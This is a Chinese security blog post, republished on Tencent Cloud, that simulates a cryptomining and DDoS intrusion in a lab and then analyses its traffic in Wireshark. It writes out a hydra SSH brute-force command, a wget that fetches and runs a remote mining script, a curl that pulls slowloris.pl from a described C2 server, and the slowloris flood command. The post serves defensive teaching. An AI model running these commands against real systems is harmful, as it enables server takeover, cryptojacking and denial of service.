专栏首页信安之路模拟挖矿黑客攻击过程

模拟挖矿黑客攻击过程

本文作者:Cherishao(信安之路应急小组组长)

眨眼间,2018 年的上半年就这样飞逝而过,在上半年的工作中,接触最常规的安全事件就是服务器或者办公主机被远控作为肉鸡挖矿来获取利益或者对其它网站进行 DDoS 攻击,今天分享一下如何利用 Linux 常规的 SSH 弱口令爆破 Linux 服务器并利用该服务器进行挖矿及对其它网站进行 DDoS 攻击,攻击即分析流程较为简单,如有不适之处,欢迎斧正。

实验环境

使用的 Linux 服务器及搭建的站点源码及使用的域名如下:

Linux: Kali 2.0

IP:192.168.95.132

网站部署源码:DiscuzX.7z

部署工具:phpstudy

Website Domain: Cherishao.com

使用的工具如下:

SSH爆破:hydra-8.1-windows

远程终端管理:X term

分析工具:Wireshark

网站搭建

网上下载 DiscuzX 源码,利用 PHPStudy 快速建站工具,将其源码放在其 WWW 目录下,启动即可(阅读 README.md 文档)。

域名绑定

将自己的 IP 地址,绑定在自己注册的域名,添加解析记录即可:

攻击流程

利用安全工具对指定的平台服务器(该服务器提供了常见的网络服务,例如 Web 服务、终端服务等)进行 SSH 暴力破解攻击。攻击流程设计如下:

SSH 爆破

通过分析扫描目标站点(IP地址:192.168.95.132)服务器,发现服务器开启 SSH22 端口、操作系统类型为 Linux。

利用 hydra 进行 SSH 爆破获取服务器权限:

hydra -l root -P 字典 -V ssh://192.168.95.132

通过暴力破解得到的 (root/123456) 进入服务器:

连接上服务器后,运行脚本获取远端挖矿程序。服务器当前状态:

利用服务器挖矿

获取安装脚本

wget --no-check-certificate https://www.yiluzhuanqian.com/soft/script/mservice_2_5.sh -O mservice.sh

执行脚本开始挖矿

sudo bash mservice.sh 10014 #该ID可替换为自己的用户ID

服务器挖矿时的 CPU 状态(CPU 飙升到 96%):

DDoS 攻击

利用该服务器对(网站: Cherishao.com ) DDoS 攻击。

从 C2 服务器,获取 DDoS shell

Curl http://173.82.235.146/slowloris.pl

对该站点进行 DDos 攻击

slowloris.pl -dns cherishao.com -timeout 1 - num 1000

网站正常运行时状态:

Ddos 攻击后网站状态:

通信特征流分析

利用 Wireshark 抓包分析

挖矿数据流分析

从上图的通信数据流中,我们可以发现挖矿者使用的钱包地址:

42d4D8pASAWghyTmUS8a9yZyErA4WB18TJ6Xd2rZt9HBio2aPmAAVpHcPM8yoDEYD9Fy7eRvPJhR7SKFyTaFbSYCNZ2t3ik

代理:

“XMRig/2.5.2”

Xig 代理特征

DDoS 数据流分析

通过分析发现对Cherishao.com网站的大量DNS请求包:

总结及相关附件

总结

近些年,新出现了众多入侵系统的手法,像 Apache Struts2 漏洞利用、Hadoop Yarn REST API未授权漏洞利用,但是古老的 SSH 暴力破解攻击手段不仅没有消亡,反而愈演愈烈。

本文通过这样一个简单的设计,主要是想传达:一但 Hacker 取得了我们系统的权限,他可以做比较多的事情,信息窃取,数据破坏,对外攻击等诸多对我们不利的事情,在日常的工作及生活中请加强密码防护策略的重视,加强自身安全意识。

相关附件

https://pan.baidu.com/s/1ZkrmAmbNUHve6MW7cCQCNQ 密码:mp3l

参考链接

SSH 暴力破解趋势

http://www.freebuf.com/articles/paper/177473.html

本文分享自微信公众号 - 信安之路(xazlsec),作者:Cherishao

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2018-07-23

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 配置漏洞之DNS域传送

    DNS区域传送(DNS zone transfer)指的是一台备用服务器使用来自主服务器的数据刷新自己的域(zone)数据库,目的是为了做冗余备份,防止主服务器...

    信安之路
  • Apache Solr Velocity RCE 真的 getshell 了吗

    在复现 Apache Solr Velocity 模板注入时,发现了一些问题,因为这些问题即使可以执行命令,也不能进行后续渗透。

    信安之路
  • 优秀的 WIFI 渗透工具汇总

    今天给大家收集和整理了一些常用的 WiFi 渗透工具,工具对于我们这些人来说是最熟悉的东西之一了,选择一个好的工具会让你事半功倍。(工具顺序不分名次)

    信安之路
  • RubyMiner挖矿程序24小时内影响全球30%的网络

    近日,Check Point 的安全研究人员发现了 RubyMiner 恶意软件家族,针对全球的 web 服务器发起攻击,并试图利用这些服务器挖掘门罗币。24 ...

    FB客服
  • 安全报告 | SSH 暴力破解趋势:从云平台向物联网设备迁移

    云鼎实验室
  • 浅谈最近流行的三起区块链51%算力攻击

    很多人可能早就听说过 51% 算力攻击,但更多的可能源于各种媒体渠道中“比特币的缺陷”文章之流。实际上,这个说法并不准确,根据比特币百科上所描述,这种攻击被称为...

    FB客服
  • Docker技术三大要点:cgroup, namespace和unionFS的理解

    从这张gif图片,我们不难看出Docker网站想传达这样一条信息, 使用Docker加速了build,ship和run的过程。

    Jerry Wang
  • 深入理解RPC之序列化篇--Kryo

    一年前,笔者刚刚接触RPC框架,从单体式应用向分布式应用的变革无疑是让人兴奋的,同时也对RPC背后到底做了哪些工作产生了兴趣,但其底层的设计对新手而言并不是很...

    kirito-moe
  • torch.zeros

    版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。 ...

    于小勇
  • 为什么有些网站打开这么慢?

    为什么你的网站打开慢? 为什么流量来了,服务器却挂了? 你的用户体验是12306还是天猫双十一? 作为一个专业的IT运维,你能够获得足够多的服务器数据,让你做出...

    程序员互动联盟

扫码关注云+社区

领取腾讯云代金券